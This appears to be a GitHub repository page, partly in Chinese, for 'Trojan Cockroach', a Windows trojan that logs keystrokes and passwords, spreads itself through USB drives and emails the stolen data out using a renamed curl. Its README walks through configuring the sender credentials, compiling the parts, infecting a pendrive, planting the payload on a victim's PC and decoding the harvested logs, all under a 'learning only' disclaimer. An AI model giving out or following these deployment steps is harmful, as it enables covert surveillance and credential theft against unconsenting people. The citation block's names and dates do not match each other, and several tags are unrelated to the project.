Sunil56224972/Trojan.Cockroach

GitHub: Sunil56224972/Trojan.Cockroach

一个面向教学目的的Windows木马间谍软件,系统演示了键盘记录、USB自传播和数据外泄等恶意软件核心技术。

Stars: 4 | Forks: 1

Trojan Cockroach

#### 隐蔽的木马间谍软件 你看到的是一款**木马病毒**,它会从 PC(Windows XP 及更高版本)中窃取数据(ID、密码;每一次按键),然后通过电子邮件发送给你。它通过 USB 驱动器在 PC 之间传播,并且几乎无法被任何杀毒软件检测到。 *仅出于学习目的而创建。* ### 简介 - [TrojanCockroach.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.cpp)- 记录用户数据,通过 Transmit.exe 发送数据,感染便携式驱动器。 - [Infect.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.cpp)- 从便携式驱动器将病毒安装到计算机中。 - [Transmit.exe](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Transmit.exe)- 将数据通过电子邮件发送回。 - [TrojanCockroach.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.lnk)- 驻留在 PC 的启动文件夹中,并激活 TrojanCockroach.exe。 - [Infect.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.lnk)- 在受感染的便携式驱动器中使用各种具有吸引力的名称,点击时激活 Infect.exe。 - [DecodeMessage.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/DecodeMessage.cpp)- 用于解码收到的电子邮件。 ### 设置
  1. Preparation
    1. Download the full package from here.

    2. Change the method sendData() of TrojanCockroach.cpp- place your email and password in the command.
      change email address

    3. Compile TrojanCockroach.cpp & Infect.cpp. Transmit.exe is actually the executable distribution of curl for Windows.

    4. Place TrojanCockroach.exe, Infect.exe, Transmit.exe, Infect.lnk & TrojanCockroach.lnk in the same folder. This is how they look-
      Trojan Cockroach full package

    5. Now run TrojanCockroach.exe then insert a pendrive (see the magic!). You will get a hidden folder and link file in your pendrive. The hidden folder contains the full package, & the link file is actually renamed form of Infect.lnk.
      Trojan Cockroach infected pendrive

  2. Attack
    1. Insert the USB-Drive in the subject's PC (Yes, you have to start the spreading process from somewhere!). Run Infect.lnk and the spyware will be injected.

    2. The syware will be activated after a reboot. Now (after a restart) every time any USB-Drive is inserted in the affected PC, the virus will copy itself in that, and the cycle will start again.

  3. Data Collection
    1. You need to wait several days (depending on the number of power on/off of the PC), before getting any data.

    2. After getting the email copy the full message to a text file.
      Trojan Cockroach infected pendrive
      As the message has come through email certain characters are converted. To resolve that --- --- ---.

    3. Now, run DecodeMessage.exe for decoding the message as plain text.
      Trojan Cockroach infected pendrive
      In this phase, you can look for specific patterns in the text, and thus get rid of most of the useless parts (like- mouse click, or same key-group press as happens during gaming).

### 更多信息 你可以阅读 [TrojanCockroachStory](https://github.com/MinhasKamal/TrojanCockroach/blob/master/TrojanCockroachStory.md) 来了解该程序的工作原理概览。通过它的前置项目——**[StupidKeyLogger](https://github.com/MinhasKamal/StupidKeyLogger)**,你将对本项目有更清晰的理解。 该项目完全可以运行。但是,我不希望新手滥用我的项目。所以,我**保留了一些未公开的简单秘密**。在这个“README”中也有一些故意留下的**漏洞**。我在代码中也做了一些**无意义的修改**;这样——没有人可以在不亲自动手修改的情况下有效地运行它。我相信***真正的程序员***可以轻松克服这些简单的障碍 :) **注意:** *对于他人使用此程序进行的任何不良行为,我也不承担任何责任。* 但我相信真正的学习者会从中受益匪浅。 ### 引用 ``` @misc{Minhas2015TrojanCockroach, author = {Sunil, Yogi}, title = {Trojan Cockroach: A Stealthy Trojan Spyware}, year = {2024}, publisher = {GitHub}, url = {https://github.com/Sunil56224972/Trojan.Cockroach} } ``` ### 许可证 MIT License
Trojan Cockroach 采用 MIT License 授权。
标签:C++, CTF学习, DNS 解析, OpenCanary, USB传播, 中高交互蜜罐, 内网渗透, 子域名枚举, 恶意软件, 恶意软件开发, 教育用途, 数据擦除, 数据窃取, 木马, 离地攻击, 端点可见性, 系统安全, 网络安全, 邮件外发, 键盘记录, 间谍软件, 隐私保护, 隐蔽攻击